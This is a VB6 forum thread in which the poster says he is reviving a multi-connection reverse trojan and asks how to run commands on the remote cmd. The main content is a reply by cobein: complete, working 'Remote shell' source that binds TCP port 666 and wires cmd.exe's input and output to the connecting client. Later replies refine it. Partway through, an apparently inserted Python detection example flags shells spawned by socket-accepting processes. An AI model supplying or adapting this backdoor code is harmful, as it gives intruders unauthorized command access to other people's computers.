Topic: Help with CMD Pipe vb6 (Read 10,611 times)
hepy_92
Hi. A few years ago I wrote a multi-connection reverse trojan; I've now picked it up again because I want to use it again, and I'm working on sending commands to the remote cmd and getting back what happens (e.g. I send dir C:\ and it returns the result, listing the files in C:\). For this I found this cmd pipe code:

```vb
'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finished.
Option Explicit

Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long     ' LPBYTE pointer (4 bytes); declared As Byte in the original, which made cb = Len(sui) come out short
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Declared but not used by Redirect; the member names Internal/InternalHigh were truncated in the original
Private Type OVERLAPPED
    Internal As Long
    InternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
    Command1.Enabled = False
    Redirect Text1.Text, Text2
    Command1.Enabled = True
End Sub

Private Sub Form_Load()
    Text1.Text = "ping"
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    ' Refuse to unload while a redirected process is still running
    If Command1.Enabled = False Then Cancel = True
End Sub

Sub Redirect(cmdLine As String, objTarget As Object)
    Dim i%, t$
    Dim pa As SECURITY_ATTRIBUTES
    Dim pra As SECURITY_ATTRIBUTES
    Dim tra As SECURITY_ATTRIBUTES
    Dim pi As PROCESS_INFORMATION
    Dim sui As STARTUPINFO
    Dim hRead As Long
    Dim hWrite As Long
    Dim bRead As Long
    Dim lpBuffer(1024) As Byte

    ' The pipe handles must be inheritable so the child can write to hWrite
    pa.nLength = Len(pa)
    pa.lpSecurityDescriptor = 0
    pa.bInheritHandle = True
    pra.nLength = Len(pra)
    tra.nLength = Len(tra)

    If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
        sui.cb = Len(sui)
        GetStartupInfo sui
        ' The child's stdout and stderr both go to the write end of the pipe
        sui.hStdOutput = hWrite
        sui.hStdError = hWrite
        sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
        sui.wShowWindow = SW_HIDE
        ' lpEnvironment is a NULL pointer (ByVal 0&) so the child inherits our environment;
        ' the original passed the Variant Null by reference
        If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, ByVal 0&, vbNullString, sui, pi) <> 0 Then
            ' Close our copy of the write end now: while we hold it, ReadFile can never
            ' report end-of-pipe after the child exits (the original closed it inside the loop)
            CloseHandle hWrite
            SetWindowText objTarget.hwnd, ""
            Do
                Erase lpBuffer()
                If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
                    ' Append the chunk (NUL-terminated thanks to Erase) at the end of the textbox
                    SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
                    SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
                    DoEvents
                Else
                    ' ReadFile fails with ERROR_BROKEN_PIPE once the child has closed its end
                    CloseHandle pi.hThread
                    CloseHandle pi.hProcess
                    Exit Do
                End If
            Loop
        Else
            CloseHandle hWrite
        End If
        CloseHandle hRead
    End If
End Sub
```

To send commands like cd or dir you have to prepend "cmd /k" (e.g. cmd /k dir C:\). Don't ask me why (if someone can explain why it has to be done, I'd appreciate it haha), but anyway, the problem is that when I send a command like dir or cd, I get this error:

Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo

Help please! Thanks in advance.
cobein
There is a way to do this properly, which is to connect stdio to a socket. Later, if I have a moment, I'll write it and post it.
hepy_92
OK, that would be much appreciated! Any other ideas? Thanks.
hepy_92
How do I know which timer is the one that is "out of range"? And what does it mean that it is out of range? Sorry if my question is a bit noob, but it's been a long time since I touched VB6.

Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo

Thanks.
shaggikpo
On exactly which line does the error occur?
cobein
OK, here is the example:

```vb
'---------------------------------------------------------------------------------------
' Module      : mMS
' DateTime    : 12/13/2009 20:16
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advancevb.com.ar
' Purpose     : Remote shell
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : NGS - Writing small shellcode paper
'
' History     : 12/13/2009 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

' &HFFFF is the Integer literal -1, so this widens to &HFFFFFFFF as a Long
Private Const INFINITE As Long = &HFFFF
Private Const SOCK_STREAM As Long = 1
Private Const AF_INET As Long = 2
Private Const IPPROTO_TCP As Long = 6
Private Const STARTF_USESTDHANDLES As Long = &H100
Private Const STARTF_USESHOWWINDOW As Long = &H1

Private Const WSADESCRIPTION_LEN As Long = 257
Private Const WSASYS_STATUS_LEN As Long = 129

Public Type WSAData
    wVersion As Integer
    wHighVersion As Integer
    szDescription As String * WSADESCRIPTION_LEN
    szSystemStatus As String * WSASYS_STATUS_LEN
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Public Type sockaddr_in
    sin_family As Integer
    sin_port As Integer
    sin_addr As Long
    sin_zero(1 To 8) As Byte
End Type

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long     ' LPBYTE pointer (4 bytes); declared As Byte in the original, which made cb = Len() come out short
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long
Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long
' namelen is passed by value in the real bind() prototype (the original declared it ByRef)
Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByVal namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function htons Lib "wsock32.dll" (ByVal hostshort As Long) As Integer
Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long
Private Declare Function closesocket Lib "wsock32.dll" (ByVal s As Long) As Long

Public Sub Main()
    Dim lSock As Long
    Dim tSA As sockaddr_in
    Dim tWD As WSAData
    Dim lHandle As Long
    Dim lAddrLen As Long
    Const PORT As Long = 666

    If WSAStartup(&H101, tWD) = 0 Then
        ' WSASocket with dwFlags = 0 gives a non-overlapped socket, which is what a std handle needs
        lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, ByVal 0&)
        If Not lSock = -1 Then
            With tSA
                .sin_family = AF_INET
                .sin_port = htons(PORT)
                ' .sin_addr stays 0 = INADDR_ANY
            End With
            If bind(lSock, tSA, Len(tSA)) = 0 Then
                If listen(lSock, 0&) = 0 Then
                    ' Blocks here until a client connects
                    lAddrLen = Len(tSA)
                    lHandle = accept(lSock, tSA, lAddrLen)

                    Dim tSTARTUPINFO As STARTUPINFO
                    Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
                    Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES

                    tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES)
                    ' The accepted socket becomes stdin, stdout and stderr of the child
                    With tSTARTUPINFO
                        .cb = Len(tSTARTUPINFO)
                        .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
                        .hStdInput = lHandle
                        .hStdOutput = lHandle
                        .hStdError = lHandle
                    End With
                    ' lpEnvironment must be a NULL pointer (ByVal 0&) to inherit the environment;
                    ' the original passed 0& by reference, which hands the child an empty environment block
                    If CreateProcessA(vbNullString, "cmd", _
                        tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                        ByVal 0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
                        Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE)
                    End If
                End If
            End If
            Call closesocket(lHandle)
            Call closesocket(lSock)
        End If
        Call WSACleanup
    End If
End Sub
```

A few things to bear in mind:
1. The code will freeze while waiting for a connection.
2. There are many structures that could be left out, but I kept them so the example is clearer.
3. You can connect using telnet (open localhost 666). On Vista, and I'm not sure about 7, telnet is not installed by default.
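A defender's view of the shell-over-socket pattern cobein's module implements: a process that accepts a TCP client and shortly afterwards spawns cmd.exe with inherited handles. This is an added detection example, not code from the thread; the JSON event shape, the sample events, the `window` parameter and the `SHELL_IMAGES` set are constructed assumptions, not a real product schema.

```python
import json

# Constructed sample telemetry (assumed, simplified Sysmon-like JSON shape).
# Event 2 reproduces the module above: the listener (pid 4321) accepts a client,
# then cmd.exe appears with that listener as its parent. Events 3 to 5 are noise.
SAMPLE_EVENTS = [
    r'{"ts": 1, "event": "accept", "pid": 4321, "image": "C:\\Users\\u\\mms.exe", "remote": "10.0.0.5:51000"}',
    r'{"ts": 3, "event": "process_create", "pid": 4350, "ppid": 4321, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd"}',
    r'{"ts": 4, "event": "process_create", "pid": 5000, "ppid": 800, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd /k dir C:\\"}',
    r'{"ts": 5, "event": "process_create", "pid": 5100, "ppid": 4321, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer"}',
    r'{"ts": 90, "event": "process_create", "pid": 5200, "ppid": 4321, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd"}',
]

# Image basenames treated as interactive shells. The module launches "cmd" and
# Karcrack's %COMSPEC% suggestion resolves to the same binary, so match on the
# image path rather than on the command line.
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}


def detect_socket_shells(lines, window=30):
    """Flag shells spawned by a process that accepted a TCP client within `window` seconds.

    Returns a list of alert dicts (child pid, parent pid, remote peer, command line).
    """
    last_accept = {}  # pid -> (ts, remote) of that process's most recent accept()
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev["event"] == "accept":
            last_accept[ev["pid"]] = (ev["ts"], ev["remote"])
        elif ev["event"] == "process_create":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            parent = last_accept.get(ev.get("ppid"))
            if image in SHELL_IMAGES and parent and ev["ts"] - parent[0] <= window:
                alerts.append({"child_pid": ev["pid"], "parent_pid": ev["ppid"],
                               "remote": parent[1], "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_socket_shells(SAMPLE_EVENTS):
        print("shell spawned by socket-accepting parent:", alert)
```

With the default 30-second window only pid 4350 is flagged; the late cmd.exe at ts 90 is caught only if the window is widened, which is the trade-off between coverage and false positives on legitimate servers that happen to spawn shells.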
Karcrack
Very nice code. Just one thing:

```vb
If CreateProcessA(vbNullString, "cmd", _
    tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
    0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
```

Instead of 'cmd' I think '%COMSPEC%' would be better.
hepy_92
I didn't understand what you posted at all :S Sorry for my ignorance, I'm a newbie... but what is that?
Karcrack
"On which PC would it not be cmd?" Any version of W$ before XP. Anyway, environment variables ftw!!!